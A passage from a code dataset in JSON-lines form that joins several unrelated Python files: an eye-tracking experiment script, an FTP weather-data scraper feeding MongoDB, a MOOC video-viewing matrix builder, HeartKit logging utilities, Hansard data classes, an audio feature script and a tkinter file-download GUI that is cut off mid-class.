keyboard.wait('Enter')\r\n plt.close()\r\n return [point, message]\r\n\r\n # DURING TEST: wait for user input\r\n if user_input == False:\r\n keyboard.wait('Enter')\r\n user_input = True\r\n point.set_color('lime')\r\n return [point, message]\r\n\r\n # Record current dot coords (set on startup or by last loop).\r\n if coords_index < dot_coords.shape[0]:\r\n dot_df.loc[coords_index] = [datetime.now(), dot_coords[coords_index][0], dot_coords[coords_index][1]]\r\n\r\n # All dot coords used: trigger exit sequence.\r\n if coords_index == dot_coords.shape[0] - 1:\r\n exit_state = exit_state + 1\r\n return [point, message]\r\n\r\n # Dot has reached side of screen on last update: reset user_input and return.\r\n if coords_index in rec_stop_points:\r\n rec_stop_points.remove(coords_index)\r\n user_input = False\r\n point.set_color('white')\r\n stop_point_i = (stop_point_i + 1) % 2\r\n return [point, message]\r\n\r\n # Side of screen not reached: increment coords_index, update dot position, return.\r\n coords_index = coords_index + 1\r\n point.set_data([dot_coords[coords_index][0]],[dot_coords[coords_index][1]])\r\n return [point]\r\n\r\n ### END dot_run PROCESS FUNCTION DEFINITIONS ###\r\n\r\n # populate dot_coords with all required dot x and y coordinates\r\n for i, dot_axis in enumerate([[dot_start_x, dot_stop_x], [dot_start_y, dot_stop_y]]):\r\n # create complete dot coordnates for dot_axis (x or y)\r\n coords_start = np.linspace(dot_axis[0], dot_axis[0], int(num_dot_positions/4))\r\n coords_forward = np.linspace(dot_axis[0], dot_axis[1], num_dot_positions)\r\n coords_terminal = np.linspace(dot_axis[1], 
dot_axis[1], int(num_dot_positions/4))\r\n coords_backward = np.linspace(dot_axis[1], dot_axis[0], num_dot_positions)\r\n coords = np.concatenate([coords_start, coords_forward, coords_terminal, coords_backward])\r\n coords = np.tile(coords, num_repeat)\r\n # add to dot_coords\r\n dot_coords = dot_coords.reshape((i, len(coords)))\r\n dot_coords = np.vstack((dot_coords, coords))\r\n # transpose dot_coords\r\n dot_coords = dot_coords.T\r\n\r\n # calculate recording stop points\r\n for i in range(num_repeat):\r\n repeat_interval = 2*int(num_dot_positions/4) + 2*num_dot_positions\r\n rec_stop_points.append(int(num_dot_positions/4) + num_dot_positions + i*repeat_interval)\r\n rec_stop_points.append(2*int(num_dot_positions/4) + 2*num_dot_positions + i*repeat_interval)\r\n\r\n # wait for sensor process to confirm connection\r\n if record_sensors:\r\n while not dot_from_sensor.poll():\r\n time.sleep(0.01)\r\n print(\"\\n %s\\n\" % dot_from_sensor.recv())\r\n\r\n # Create and initialise animation plot\r\n fig = plt.figure(facecolor='black')\r\n axes = fig.add_subplot(111, autoscale_on=False)\r\n axes.set_xlim(0-0.01*axes_lim, 8+0.01*axes_lim)\r\n axes.set_ylim(0-0.01*axes_lim, 8+0.01*axes_lim)\r\n axes.get_xaxis().set_ticks([])\r\n axes.get_yaxis().set_ticks([])\r\n fig.set_size_inches(18.5, 10.5, forward=True)\r\n axes.set_facecolor('black')\r\n point, = axes.plot([dot_start_x],[dot_start_y], 'wo', animated=blit, markersize=markersize)\r\n message = axes.text(axes_lim/2, axes_lim/2, '', fontsize=20, fontweight='bold', color='white', ha='center', va='center', zorder=10)\r\n\r\n # create animation\r\n animation = FuncAnimation(fig, ani, interval=200, blit=blit, repeat=False)\r\n # format display\r\n fig.tight_layout() #reduce margins\r\n figManager = plt.get_current_fig_manager()\r\n figManager.window.showMaximized()\r\n plt.show()\r\n\r\n # Animation over: send filepath, finish process\r\n dot_to_main.send(filepath)\r\n return\r\n\r\n# MAIN FUNCTION OF SENSOR PROCESS\r\ndef sensor_record(sensor_from_dot, sensor_to_main, sensor_to_dot):\r\n\r\n # send PID\r\n sensor_to_main.send(os.getpid())\r\n\r\n ### PROCESS VARIABLES ###\r\n data = []\r\n timestamps = []\r\n\r\n # create serial connection\r\n print('\\n Connecting to serial device . . .')\r\n ser = serial.Serial(serial_port, baud_rate, timeout=1)\r\n # read lines until reading syncs, notify dot_process when connected.\r\n header_i = 200\r\n while header_i > 0:\r\n raw_data = ser.readline()\r\n header_i = header_i - 1\r\n # Confirm stable connection with dot_process\r\n sensor_to_dot.send(\"Serial device connected.\")\r\n\r\n # read data until signalled to stop\r\n while not sensor_from_dot.poll():\r\n try:\r\n raw_data = ser.readline()\r\n raw_data = raw_data.decode()\r\n data.append(raw_data)\r\n timestamps.append(datetime.now())\r\n except:\r\n pass\r\n\r\n # message user, get filepath\r\n print('\\n Processing data . . 
.')\r\n dot_filepath = sensor_from_dot.recv()\r\n sensor_filepath = dot_filepath.replace('dot', 'sensor')\r\n\r\n # Process data: check for valid lines by tring to convert strings to float.\r\n if process_sensor_data:\r\n file = open(sensor_filepath, 'w')\r\n file.write(\"timestamp,LL,LC,LR,RL,RC,RR\\n\")\r\n for i, ts in enumerate(timestamps):\r\n try:\r\n line = data[i].replace('\\n', \"\").replace('\\r', \"\").split(',')\r\n line = \"%f,%f,%f,%f,%f,%f\" % tuple([float(x) for x in line])\r\n file.write(ts.strftime('%Y-%m-%dT%H:%M:%S.%f') + ',' + line + \"\\n\")\r\n except:\r\n pass\r\n file.close()\r\n\r\n # Else data processing turned off: just save raw data text file\r\n else:\r\n sensor_filepath = sensor_filepath.replace(\"csv\", \"txt\")\r\n file = open(sensor_filepath, 'w')\r\n for i, ts in enumerate(timestamps):\r\n line = data[i].replace('\\n', \"\").replace('\\r', \"\")\r\n file.write(ts.strftime('%Y-%m-%dT%H:%M:%S.%f') + ',' + line + \"\\n\")\r\n file.close()\r\n\r\n # Data recording and processing finished, signal main process and return\r\n print(' Data processing completed.\\n Sensor data saved as:\\n %s\\n' % sensor_filepath)\r\n sensor_to_main.send(sensor_filepath)\r\n return\r\n\r\n#######\r\n# RUN #\r\n#######\r\nif __name__=='__main__':\r\n\r\n # reset dir_char if running on Windows\r\n if sys.platform in ['Win32', 'Win64']:\r\n dir_char = '\\\\'\r\n\r\n # Process comms\r\n main_from_dot, dot_to_main = Pipe()\r\n sensor_from_dot, dot_to_sensor = Pipe()\r\n main_from_sensor, sensor_to_main = Pipe()\r\n dot_from_sensor, sensor_to_dot = Pipe()\r\n\r\n # Create and start processes\r\n dot_process = Process(target=dot_run, args=(dot_to_main, dot_to_sensor, dot_from_sensor,))\r\n dot_process.start()\r\n if record_sensors:\r\n sensor_process = Process(target=sensor_record, args=(sensor_from_dot, sensor_to_main, sensor_to_dot,))\r\n sensor_process.start()\r\n\r\n # setup SIGINT_handler: exit using ctrl-C and it will terminate processes.\r\n signal.signal(signal.SIGINT, SIGINT_handler)\r\n\r\n # get and print PIDs\r\n sensor_PID_string = \"\"\r\n dot_PID = main_from_dot.recv()\r\n if record_sensors:\r\n sensor_PID = main_from_sensor.recv()\r\n sensor_PID_string = \"\\n sensor_record process started - PID: %d\" % sensor_PID\r\n print(\"\\n dot_run process started - PID: %d%s\" % (dot_PID, sensor_PID_string))\r\n\r\n # wait for confirmation of data file creation from sub-processes\r\n dot_filepath = main_from_dot.recv()\r\n print('Hey')\r\n if record_sensors:\r\n sensor_filepath = main_from_sensor.recv()\r\n\r\n # terminate sub-processes after all inter-process comms are done\r\n if record_sensors:\r\n sensor_process.terminate()\r\n dot_process.terminate()\r\n print(\" (Sub-processes successfully terminated.)\\n\")\r\n\r\n # confirm data\r\n if confirm_data:\r\n post_test_check(dot_filepath, sensor_filepath)\r\n","repo_name":"LuyaoGuo/NIRSense_eye_tracking","sub_path":"pursuit_code/smoothPursuit_experiment_code.py","file_name":"smoothPursuit_experiment_code.py","file_ext":"py","file_size_in_byte":16099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"43130168385","text":"import os\nfrom datetime import datetime\nfrom ftplib import FTP\nfrom os import makedirs, stat\nfrom pyexpat import ExpatError\nfrom typing import Optional\nfrom xml.etree.ElementTree import ParseError\n\nimport xmltodict\nfrom dateutil import parser\nfrom decouple import AutoConfig\nfrom pymongo import MongoClient\n\nfrom models import StationDocument, 
MeasurementDocument\nfrom . import logger\nfrom .conf import MEASUREMENT_ATTRS_MAPPING, MEASUREMENT_ATTRS_TO_SKIP\n\n\nclass SkipFileError(Exception):\n pass\n\nclass Scraper:\n \"\"\"\n Class managing scraping data from given host to given Mongo instance defined by connection.\n \"\"\"\n\n def __init__(\n self,\n config: AutoConfig,\n connection: MongoClient\n ):\n self._config = config\n self._connection = connection\n\n def run_from_local_dir(self):\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n loaded_measurements = 0\n for root, sub_dirs, files in os.walk(local_storage_dir):\n for file_to_load in files:\n pth = os.path.join(root, file_to_load)\n\n try:\n loaded_measurements += self._try_to_store_from_file(pth=pth)\n logger.info('Loaded %s.', pth)\n except SkipFileError as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n\n logger.info('Loaded %s measurements.', loaded_measurements)\n\n def run_from_ftp(self):\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n scraped = self._scrape()\n\n makedirs(local_storage_dir, exist_ok=True)\n\n loaded_measurements = 0\n for f in scraped:\n pth = os.path.join(local_storage_dir, f)\n try:\n loaded_measurements += self._try_to_store_from_file(pth=pth)\n logger.info('Loaded %s.', pth)\n except SkipFileError as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n\n logger.info('Loaded %s measurements.', loaded_measurements)\n\n def _scrape(self):\n host = self._config('FTP_HOST')\n files_to_scrape = set(self._config('FILES_TO_SCRAPE').split())\n dir_to_scrape = self._config('FTP_DIR')\n local_storage_dir = self._config('LOCAL_STORAGE_DIR')\n\n logger.info('Logging to FTP %s in progress.', host)\n\n with FTP(host=host, ) as ftp:\n ftp.login()\n ftp.cwd(dir_to_scrape)\n\n scraped_files = set()\n ftp.retrlines('NLST', scraped_files.add)\n\n found_to_scrape = scraped_files & files_to_scrape\n\n logger.debug('Found %s files to scrape: %s.', len(files_to_scrape), ','.join(found_to_scrape))\n\n for i, to_scrape in enumerate(found_to_scrape, start=1):\n local_file_pth = os.path.join(local_storage_dir, to_scrape)\n\n last_modified_remote = self.remote_file_last_modified(ftp, to_scrape)\n last_modified_local = self._local_file_last_modified(local_file_pth)\n\n if last_modified_remote and last_modified_local and last_modified_local > last_modified_remote:\n logger.debug(\n 'File %s: %s skipped (last modified difference %s).',\n i, to_scrape, last_modified_local - last_modified_remote\n )\n continue\n\n with open(local_file_pth, 'wb') as local_fp:\n ftp.retrbinary(f'RETR {to_scrape}', local_fp.write)\n\n logger.info('File %s: %s has been scraped.', i, to_scrape)\n return found_to_scrape\n\n @staticmethod\n def remote_file_last_modified(ftp: FTP, file_name: str):\n modified = ftp.voidcmd(f'MDTM {file_name}')[4:].strip()\n\n try:\n return parser.parse(modified)\n except (ValueError, OverflowError):\n return None\n\n @staticmethod\n def _local_file_last_modified(file_name: str):\n try:\n stats = stat(file_name)\n except FileNotFoundError:\n return None\n\n return datetime.fromtimestamp(stats.st_mtime)\n\n def _try_to_store_from_file(self, pth: str) -> int:\n with open(pth, 'rb') as fd:\n content = fd.read()\n\n try:\n return self._store_data(file_content=content.decode())\n except (ParseError, UnicodeDecodeError, ExpatError) as e:\n logger.warning('Skipping %s due to: %s.', pth, e)\n raise SkipFileError from e\n\n def _store_data(self, file_content: str) -> int:\n data = xmltodict.parse(file_content)\n loaded = 0\n\n stations = 
data.get(\"product\").get(\"observations\").get(\"station\")\n for station_data in stations:\n wmo_id = int(station_data.get(\"@wmo-id\"))\n\n # checking existence of station\n station = self._get_or_create_station(station_data, wmo_id)\n\n period = station_data.get(\"period\")\n time = period.get(\"@time-utc\")\n\n measurement, was_created = self._get_or_create_measurement(time, station)\n\n if not was_created:\n logger.debug('Skipping measurement %s: %s, %s.', wmo_id, station.station_name, time)\n continue\n\n logger.debug('Loading measurement from %s: %s, %s.', wmo_id, station.station_name, time)\n elements = period.get(\"level\").get(\"element\")\n if elements is None:\n break\n\n for element in elements:\n if type(element) == str: # should probably check if element is OrderedDict\n logger.warning('Skipped text element %s.', element)\n break\n\n attr_type = (element.get(\"@type\") or '').replace('-', '_')\n\n if attr_type in MEASUREMENT_ATTRS_TO_SKIP:\n continue\n\n data_type: Optional[callable] = MEASUREMENT_ATTRS_MAPPING.get(attr_type)\n if not data_type:\n logger.warning('Unknown attribute %s.', attr_type)\n continue\n\n setattr(\n measurement,\n attr_type,\n data_type(element)\n )\n\n measurement.save()\n loaded += 1\n return loaded\n\n @staticmethod\n def _get_or_create_measurement(time, station):\n m = MeasurementDocument.objects(station=station, time_period=time)\n if m:\n return m, False\n\n m = MeasurementDocument()\n m.station = station.to_dbref()\n m.time_period = time\n return m, True\n\n @staticmethod\n def _get_or_create_station(data, wmo_id):\n fetched_station = StationDocument.objects(wmo_id=wmo_id)\n if not fetched_station:\n station = StationDocument()\n station.wmo_id = wmo_id\n station.location = data.get(\"@tz\")\n station.station_name = data.get(\"@stn-name\")\n station.station_height = float(data.get(\"@stn-height\"))\n station.latitude = float(data.get(\"@lat\"))\n station.longitude = float(data.get(\"@lon\"))\n station.save()\n else:\n station = fetched_station.first()\n return station\n","repo_name":"thejoeejoee/UPA-MIT-VUT-2020-2021","sub_path":"python/scraper/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"14350111249","text":"#######################################################################################################################\n## count Videos \n## Written by: Sijun He\n## Last Modified by: Sijun He\n#######################################################################################################################\n## The code creates a matrix of whether each user has watched each user or not and print it into a csv file\n## Row: each unique User\n## Columns: each courses (courses have been sorted in chronological order)\n#######################################################################################################################\nimport csv, re\nimport numpy as np\nfileName = '../../data/HumanitiesSciences_StatLearning_Winter2016_VideoInteraction.csv'\nwk1 = ['2wLfFB_6SKI','LvaTokhYnDw'] \nwk2 = ['WjyuiK5taS8','UvxHOkYQl8g','VusKAosxxyk','vVj2itVNku4','jwBgGS_4RQA','jk9S3RTAl38']\nwk3 = ['PsE9UqoWtS4','J6AdoiNUyWI','1hbCJyM9ccs','3T6RXmIHbJ4','IFzVxLv0TKQ','5ONFqIk3RFg']\nwk4 = ['sqq21-VIa1c','31Q5FGRnxt4','MpX8rVv_u4E','GavRXXEHGqU','RfrGiG1Hm3M',\n'QG0pVJXT6EU','X4VDZDp2vqw','6FiNGTYAOAA','TxvEVc8YNlU','2cl7JiPzkBY','9TVVF7CS3F4']\nwk5 = 
['6l9V1sINzhE','_2ij6eaaSl0','nZAM5OXrktY','S06JpVoNaA0','p4BYWX7PTBM','BzHz0J9a6k0',\n'6dSXlqHAoMk','YVSmsWoBKnA']\nwk6 = ['MEMGOlJxxz0','91si52nk3LA','nLpJd_iKmrE','NJhMSpI2Uj8','LkifE44myLc','3p9JNaJCOb4',\n'cSKzqb0EKS0','A5I1G1MfUmA','xMKVUstjXBE','QlyROnAjnEk','eYxwWGJcOfw','3kwdDGnV8MM','mv-vdysZIb4',\n'F8MMHCCoALU','1REe3qSotx8']\nwk7 = ['gtXQXA7qF3c','7ZIqzTNB8lk','mxXHJa1DsWQ','N2hBXqPiegQ','uQBnDGu6TYU','DCn83aXXuHc']\nwk8 = ['79tR7BvYE6w','6ENTbK3yQUQ','GfPR7Xhdokc','hPEJoITBbQ4','lq_xzBRIWm4','U3MdBNysk9w',\n'0wZUXtvAtDc','IY7oWGXb77o']\nwk9 = ['QpbynqiTCsY','xKsTsGE7KpI','dm32QvCW7wE','mI18GD4_ysE','qhyyufR0930','L3n2VF7yKkk']\nwk10 = ['ipyxSYXgzjQ','dbuSGWCgdzw','aIybuNt9ps4','Tuuc9Y06tAc','yUJcTpWNY_o','lFHISDj_4EQ',\n'YDubYJsZ9iM','4u3zvtfqb7w']\nvideos = wk1 + wk2 + wk3 + wk4 + wk5 + wk6 + wk7 + wk8 + wk9 + wk10\nuser_watched_video = {} ## a dictionary for the video each user watched\nevent_type = ['play_video','stop_video','pause_video','seek_video']\nwith open(fileName,'r') as csvfile :\n lines = csv.reader(csvfile, delimiter = ',', quotechar = '\"')\n for line in lines : \n if line[0] in event_type : \n if line[13] not in user_watched_video:\n user_watched_video[line[13]] = []\n if line[9] not in user_watched_video[line[13]]:\n user_watched_video[line[13]].append(line[9])\n\n## Sorted videos in chronological order \n# sorted_video_name = sorted(video_names, key=lambda video: float(re.search('(?<=Unit)\\s\\d+\\.\\d+',video).group(0)))\n#sorted_video_name = video_names\n## Create a matrix of user - video watched relation \n## 1 = user watched this video\n## 0 = user didn't watch this video\noutputName = 'HumanitiesSciences_StatLearning_Winter2016_UserVideo_Matrix.csv'\noutputFile = open(outputName, 'w')\ncolumnNames = 'UserName,'\nfor video in videos:\n columnNames += (video + ',')\ncolumnNames = columnNames[:-1] + '\\n'\noutputFile.write(columnNames)\nfor user in user_watched_video.keys():\n newLine = user + ','\n for video in videos:\n if video in user_watched_video[user]:\n newLine += '1,'\n else:\n newLine += '0,'\n newLine = newLine[:-1] + '\\n'\n outputFile.write(newLine)","repo_name":"sijunhe/DataMiningMOOC","sub_path":"countVideos/countVideo_StatsLearn.py","file_name":"countVideo_StatsLearn.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12911431904","text":"import logging\n\nfrom rich.logging import RichHandler\n\nfrom .defines import HeartTask, get_class_names\nfrom .defines import HKResult\n\n\ndef hkresult_to_str(result: HKResult) -> str:\n \"\"\"Format HKResult into string for printing\"\"\"\n rhythym_names = get_class_names(HeartTask.hrv)\n num_beats = result.num_norm_beats + result.num_pac_beats + result.num_pvc_beats\n rhythm = \"ARRHYTHMIA\" if result.arrhythmia else rhythym_names[result.heart_rhythm]\n return (\n \"--------------------------\\n\"\n \"**** HeartKit Results ****\\n\"\n \"--------------------------\\n\"\n f\" Heart Rate: {result.heart_rate}\\n\"\n f\"Heart Rhythm: {rhythm}\\n\"\n f\" Total Beats: {num_beats}\\n\"\n f\" Norm Beats: {result.num_norm_beats}\\n\"\n f\" PAC Beats: {result.num_pac_beats}\\n\"\n f\" PVC Beats: {result.num_pvc_beats}\\n\"\n f\" Arrhythmia: {'Detected' if result.arrhythmia else 'Not Detected'}\\n\"\n )\n\ndef setup_logger(log_name: str) -> logging.Logger:\n \"\"\"Setup logger with Rich\n\n Args:\n log_name (str): _description_\n\n Returns:\n logging.Logger: _description_\n \"\"\"\n logger = 
logging.getLogger(log_name)\n if logger.handlers:\n return logger\n logging.basicConfig(level=logging.ERROR, force=True, handlers=[RichHandler()])\n logger.propagate = False\n logger.setLevel(logging.INFO)\n logger.handlers = [RichHandler()]\n return logger\n","repo_name":"AmbiqAI/heartkit-demo","sub_path":"python/heartkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"36427750761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nparentHansard\n\"\"\"\n\nimport datetime\n\nclass hansardFormatting:\n '''establishes HansardFormatting type event class'''\n \n def __init__(self):\n self.FormattingID = int()\n self.FormattingType = str()\n self.FormattingText = str()\n \nclass hansardProcedural:\n '''establishes HansardProcedural type event class'''\n \n def __init__(self):\n self.ProceduralID = int()\n self.ProceduralType = str()\n self.ProceduralText = str()\n \nclass hansardStatement:\n '''establishes HansardStatement type event class'''\n \n def __init__(self):\n self.StatementID = int()\n self.StatementOwnerID = int()\n self.StatementText = str()\n\nclass hansardEvent:\n '''establishes generic Hansard event class'''\n \n def __init__(self):\n self.HansardEventID = int()\n self.HansardObjectID = int()\n self.HansardEventType = str()\n self.HansardEventContent = ()\n \nclass HansardObject:\n '''establishes generic Hansard object (Hansard Day) class'''\n \n def __init__(self):\n self.HansardObjectID = int()\n self.HansardDate = datetime.date()\n self.ParlSessID = int()\n \nclass ParlSess:\n '''establishes ParlSess class'''\n \n def __init__(self):\n self.ParlSessID = int()\n self.ParliamentCount = int()\n self.ParliamentStartDate = datetime.date()\n self.ParliamentEndDate = datetime.date()\n self.ParliamentElectionDate = datetime.date()\n self.ParliamentTotalSessions = int()\n self.PartyGovernment = str()\n self.PartyOpposition = str()\n self.GovernmentType = str()\n self.GovernmentSeatsFrac = float()\n self.NumberOfficialParties = int() \n self.ParliamentSession = int()\n self.ParliamentSessionSittingDays = int()\n self.ParliamentSessionStartDate = datetime.date()\n self.ParliamentSessionEndDate = datetime.date()\n \n \n \n \n \n \n \n \n ","repo_name":"twhyte/newHansard","sub_path":"parentHansard.py","file_name":"parentHansard.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"54170637","text":"# This is a sample Python script.\n\nimport librosa\nfrom Array_of_features_create import return_features_array\naudio_data = 'Violet.mp3'\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef main():\n\n # src = \"forest floor.mp3\"\n # dst = \"forest floor.wav\"\n #\n # # convert wav to mp3\n # sound = AudioSegment.from_mp3(src)\n # sound.export(dst, format=\"wav\")\n #\n print(\"Start Openning\")\n x, sr = librosa.load(audio_data)\n print(\"End Openning\")\n arr = return_features_array(x, sr)\n print(arr)\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n main()\n# See PyCharm help at 
https://www.jetbrains.com/help/pycharm/\n","repo_name":"cary-cyon/for_recomending_system_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"18697420162","text":"import tkinter as tk\r\nfrom tkinter import filedialog, messagebox, simpledialog\r\nimport tkinter.ttk as ttk\r\nfrom tkinter.ttk import Separator\r\nimport urllib.request\r\nimport os\r\nimport webbrowser\r\nfrom PIL import Image, ImageTk\r\n\r\n# Create the main window\r\nwindow = tk.Tk()\r\nwindow.title(\"Wget Downloader\")\r\nwindow.iconbitmap(\"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Version 1.2\\wget logo 1.ico\") # Set the path to your icon file\r\n\r\n# Add an image label at the top center\r\n# Replace with the actual path to your image file\r\nimage_path = \"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Images\\wget cover 1.png\"\r\nimage = Image.open(image_path)\r\n# Replace width and height with your desired dimensions\r\nimage = image.resize((130, 120))\r\nimage = ImageTk.PhotoImage(image)\r\nimage_label = tk.Label(window, image=image)\r\nimage_label.pack(pady=(15, 0))\r\n\r\n# Function to handle the \"Paste URL\" button\r\n\r\n\r\ndef paste_url():\r\n url_entry.delete(0, tk.END)\r\n url_entry.insert(tk.END, window.clipboard_get())\r\n\r\n\r\n# Function to handle the browse button\r\n\r\n\r\ndef select_output_dir():\r\n output_dir = filedialog.askdirectory()\r\n output_dir_entry.delete(0, tk.END)\r\n output_dir_entry.insert(tk.END, output_dir)\r\n # Set the current working directory to the selected output directory\r\n os.chdir(output_dir)\r\n\r\n\r\n# Function to handle the download process\r\n\r\n\r\ndef download_file():\r\n url = url_entry.get()\r\n output_dir = output_dir_entry.get()\r\n if url:\r\n try:\r\n file_name = os.path.basename(url)\r\n file_path = os.path.join(output_dir, file_name)\r\n # Disable the download button during the download\r\n download_button.config(state=tk.DISABLED)\r\n status_widget.update_status(\"Downloading...\")\r\n urllib.request.urlretrieve(url, file_path, reporthook=download_progress)\r\n update_status(\"Download completed.\")\r\n show_completion_popup()\r\n except Exception as e:\r\n update_status(\"Error occurred during download: \" + str(e))\r\n finally:\r\n # Enable the download button after the download\r\n download_button.config(state=tk.NORMAL)\r\n status_widget.update_status(\"Ready\")\r\n else:\r\n update_status(\"Please enter a valid URL.\")\r\n\r\n\r\n# Callback function to update the download progress\r\n\r\n\r\ndef download_progress(count, block_size, total_size):\r\n percentage = int(count * block_size * 100 / total_size)\r\n status_widget.update_progress(percentage)\r\n window.update()\r\n\r\n\r\n# Function to update the status label\r\n\r\n\r\ndef update_status(text):\r\n status_widget.update_status(text)\r\n\r\n\r\n# Function to display a pop-up window for completion status\r\n\r\n\r\ndef show_completion_popup():\r\n messagebox.showinfo(\r\n \"Download Complete\", \"The download has been completed successfully.\"\r\n )\r\n\r\n\r\n# Function to handle the \"About\" menu item\r\n\r\n\r\ndef show_about():\r\n messagebox.showinfo(\r\n \"About\", \"Wget Downloader\\nVersion 1.2\\n\\nCreated by pudsz\\n\\n... 
TTIOT ...\"\r\n )\r\n\r\n\r\n# Function to handle the \"How to use\" menu item\r\n\r\n\r\ndef show_usage():\r\n messagebox.showinfo(\r\n \"How to use\",\r\n \"1. Enter the URL of the file to download.\\n2. Select the output directory.\\n3. Click on the 'Download' button to start the download.\\n\\nNote: For detailed instructions on how to use please open the 'Help File'\",\r\n )\r\n\r\n\r\n# Function to open the help file documentation\r\n\r\n\r\ndef open_help_file():\r\n # Replace with the actual path to your help file\r\n help_file_path = r\"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Docs\\readme.txt\"\r\n webbrowser.open(help_file_path)\r\n\r\n\r\n# Function to open the release notes file documentation\r\n\r\n\r\ndef open_release_notes_file():\r\n # Replace with the actual path to your release notes file\r\n release_notes_file_path = \"G:\\Software\\py\\Python Creations\\Completed\\Projects\\Wget Downloader\\Version 1.2\\Release Notes Version 1.2.txt\"\r\n webbrowser.open(release_notes_file_path)\r\n\r\n\r\n# Function to exit the program\r\n\r\n\r\ndef exit_application():\r\n if messagebox.askokcancel(\"Exit\", \"Are you sure you want to exit?\"):\r\n window.destroy()\r\n\r\n\r\n# Function to handle the \"Check Version\" command\r\n\r\n\r\ndef check_version():\r\n messagebox.showinfo(\"Version\", \"Wget Downloader v1.2\")\r\n\r\n\r\n# Create the menu bar\r\nmenu_bar = tk.Menu(window)\r\n\r\n# Create the \"File\" menu\r\nfile_menu = tk.Menu(menu_bar, tearoff=0)\r\nfile_menu.add_command(label=\"Exit\", command=exit_application)\r\nmenu_bar.add_cascade(label=\"File\", menu=file_menu)\r\n\r\n# Create the \"Help\" menu\r\nhelp_menu = tk.Menu(menu_bar, tearoff=0)\r\nhelp_menu.add_command(label=\"How to use\", command=show_usage)\r\n# Command to open the local help file\r\nhelp_menu.add_command(label=\"Help File...\", command=open_help_file)\r\nhelp_menu.add_separator() # Add a separator\r\nhelp_menu.add_command(label=\"About\", command=show_about)\r\nmenu_bar.add_cascade(label=\"Help\", menu=help_menu)\r\n\r\n# Create the \"Version\" submenu\r\nversion_menu = tk.Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label=\"Version\", menu=version_menu)\r\nversion_menu.add_command(\r\n label=\"Check Version\", command=check_version\r\n) # Add your command here\r\nversion_menu.add_command(label=\"Release Notes...\", command=open_release_notes_file)\r\nversion_menu.add_separator() # Add a separator\r\nversion_menu.add_command(label=\"Wget Downloader\", command=None)\r\n\r\n# Add the menu bar to the window\r\nwindow.config(menu=menu_bar)\r\n\r\n# Add a label to display instructions\r\ninstructions_label = tk.Label(\r\n window,\r\n text=\"Enter the URL of the file to download:\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n)\r\ninstructions_label.pack(fill=\"both\", expand=True, pady=(10, 0))\r\n\r\n# Add an entry field for the URL\r\nurl_entry = tk.Entry(window, width=50, bg=\"#F7FCFC\")\r\nurl_entry.pack(fill=\"both\", expand=True, pady=(4, 5))\r\n\r\n# Add a \"Paste URL\" button\r\npaste_button = tk.Button(\r\n window,\r\n text=\"Paste URL\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n command=paste_url,\r\n)\r\n# Adjust the width and height as desired\r\npaste_button.config(width=9, height=0)\r\npaste_button.pack(expand=True, pady=(4, 10))\r\n\r\n# Add a separator line\r\nseparator = Separator(window, orient=tk.HORIZONTAL)\r\nseparator.pack(fill=tk.X, 
padx=(10))\r\n\r\n# Add a label to display the output directory\r\noutput_dir_label = tk.Label(\r\n window,\r\n text=\"Select output directory:\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n)\r\noutput_dir_label.pack(fill=\"both\", expand=True, pady=(10, 0))\r\n\r\n# Add an entry field to display the selected output directory\r\noutput_dir_entry = tk.Entry(window, width=50, bg=\"#F7FCFC\", justify=\"center\")\r\noutput_dir_entry.pack(fill=\"both\", expand=True, pady=(4, 5))\r\n\r\n# Add a button to browse and select the output directory\r\nbrowse_button = tk.Button(\r\n window,\r\n text=\"Browse\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n command=select_output_dir,\r\n)\r\n# Adjust the width and height as desired\r\nbrowse_button.config(width=9, height=0)\r\nbrowse_button.pack(expand=True, pady=(4, 10))\r\n\r\n# Add a separator line\r\nseparator = Separator(window, orient=tk.HORIZONTAL)\r\nseparator.pack(fill=tk.X, padx=(10))\r\n\r\n# Add a button to start the download\r\ndownload_button = tk.Button(\r\n window,\r\n text=\"Download\",\r\n bg=\"#8D80FF\",\r\n fg=\"#F2F7FF\",\r\n justify=\"center\",\r\n font=(\"Closeness Regular\", 19),\r\n command=download_file,\r\n)\r\n# Adjust the width and height as desired\r\ndownload_button.config(width=12, height=1)\r\ndownload_button.pack(pady=(10, 1))\r\n\r\n# Create a custom widget that combines the status label and progress bar\r\n\r\n\r\nclass StatusLabelWithProgressBar(tk.LabelFrame):\r\n def __init__(self, master=None, *args, **kwargs):\r\n super().__init__(master, *args, **kwargs)\r\n self.status_label = tk.Label(\r\n self,\r\n 